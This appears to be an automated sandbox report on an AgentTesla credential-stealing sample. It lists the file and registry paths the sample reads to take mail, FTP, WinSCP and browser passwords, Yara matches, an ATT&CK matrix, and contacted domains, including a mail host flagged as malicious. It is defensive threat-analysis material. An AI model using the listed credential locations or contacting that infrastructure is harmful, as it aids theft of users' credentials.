Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Users\user\AppData\Roaming\IwUNvHNy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Users\user\AppData\Roaming\IwUNvHNy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IwUNvHNy.exe PID: 5060, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match	File source: 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.525739728.0000000003164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.525329197.0000000002B54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IwUNvHNy.exe PID: 5060, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IwUNvHNy.exe PID: 5060, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	1 Deobfuscate/Decode Files or Information	111 Input Capture	114 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	23 Software Packing	NTDS	211 Security Software Discovery	Distributed Component Object Model	111 Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	Data Transfer Size Limits	23 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\IwUNvHNy.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe
https://LwV7dxVvQwzS29UTCu.com	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://UrUbMY.com	0%	Avira URL Cloud	safe
https://api.ipify.orgmail.strictfacilityservices.comaccounts	0%	Avira URL Cloud	safe
http://mail.strictfacilityservices.com	0%	Avira URL Cloud	safe
http://strictfacilityservices.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.ipify.org.herokudns.com	3.220.57.224	true	false	unknown
strictfacilityservices.com	111.118.212.38	true	true	unknown
api.ipify.org	unknown	unknown	false	high
mail.strictfacilityservices.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.apache.org/licenses/LICENSE-2.0	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.strictfacilityservices.com	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537441042.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537562439.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.537961908.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://UrUbMY.com	IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://LwV7dxVvQwzS29UTCu.com	IwUNvHNy.exe, 0000000E.00000002.533988988.00000000033AB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://strictfacilityservices.com	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.537562439.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.537961908.00000000033EA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.orgmail.strictfacilityservices.comaccounts	IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
http://fontfabrik.com	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
